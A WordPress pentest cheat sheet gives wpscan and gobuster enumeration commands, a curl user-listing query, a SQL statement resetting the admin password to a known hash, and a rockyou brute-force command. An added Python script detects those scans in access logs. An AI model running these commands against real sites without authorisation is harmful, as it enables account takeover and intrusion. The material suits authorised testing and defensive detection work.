WordPress

Scan

General scan

wpscan --url $URL
wpscan --url $URL --api-token='...'

Enumeration

Directory enumeration

gobuster dir --url $IP --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Enumerate plugins

wpscan --url http://$URL -e ap --plugins-detection aggressive

Enumerate users

wpscan --url $IP --enumerate u
curl -s $URL/index.php/wp-json/wp/v2/users | jq -r '.[].slug'

Other

Inject password 'hacker'

UPDATE `wp_users` SET `user_pass` = '$P$BPNNFH6DCWFkvqe6CiUrKMXzu0cojQ1' WHERE user_login = 'admin';

Brute-force login

wpscan --url $URL -U user.txt -P /usr/share/wordlists/rockyou.txt

Search files that contain a version string

grep -RF '5.9.2' /workspace/latest/source_code
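
Detecting the scans above in access logs

Added example, not part of the original cheat sheet: a Python pass over web server access logs that flags what the enumeration and brute-force commands above leave behind (requests to the users REST endpoint or ?author=N, repeated login POSTs, bursts of 404s under /wp-content/plugins/). The log lines, thresholds and finding names are constructed assumptions.

```python
import re
from collections import Counter, defaultdict

# Combined/common log format: ip, method, path and status are all we need.
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
USER_ENUM = re.compile(r'/wp-json/wp/v2/users|[?&]rest_route=/wp/v2/users|[?&]author=\d+')
LOGIN = re.compile(r'^/(wp-login\.php|xmlrpc\.php)')
PLUGIN = re.compile(r'^/wp-content/plugins/([^/]+)/')

def detect(lines, login_threshold=5, plugin_threshold=5):
    """Return {ip: sorted findings} for one batch (time window) of log lines."""
    logins, plugins, findings = Counter(), defaultdict(set), defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip malformed lines instead of failing the whole batch
        ip, method, path = m["ip"], m["method"], m["path"]
        if USER_ENUM.search(path):
            findings[ip].add("user-enumeration")
        if method == "POST" and LOGIN.match(path):
            logins[ip] += 1
        p = PLUGIN.match(path)
        if p and m["status"] == "404":
            plugins[ip].add(p.group(1))  # distinct missing plugins probed
    for ip, n in logins.items():
        if n >= login_threshold:
            findings[ip].add("login-bruteforce")
    for ip, names in plugins.items():
        if len(names) >= plugin_threshold:
            findings[ip].add("plugin-probing")
    return {ip: sorted(f) for ip, f in findings.items()}

def sample_log():
    """Constructed log lines using documentation IP ranges, not real traffic."""
    fmt = '{ip} - - [10/Mar/2024:10:00:00 +0000] "{req} HTTP/1.1" {st} 0 "-" "-"'
    rows = [("203.0.113.7", "GET /index.php/wp-json/wp/v2/users", 200),
            ("198.51.100.9", "POST /wp-login.php", 200)]  # one ordinary login
    rows += [("203.0.113.7", "POST /wp-login.php", 200)] * 6
    rows += [("192.0.2.44", f"GET /wp-content/plugins/p{i}/readme.txt", 404)
             for i in range(6)]
    return [fmt.format(ip=ip, req=req, st=st) for ip, req, st in rows]

if __name__ == "__main__":
    for ip, found in detect(sample_log()).items():
        print(ip, found)
```

Feed it one time window of log lines at a time and tune both thresholds to the site's normal login and 404 volume.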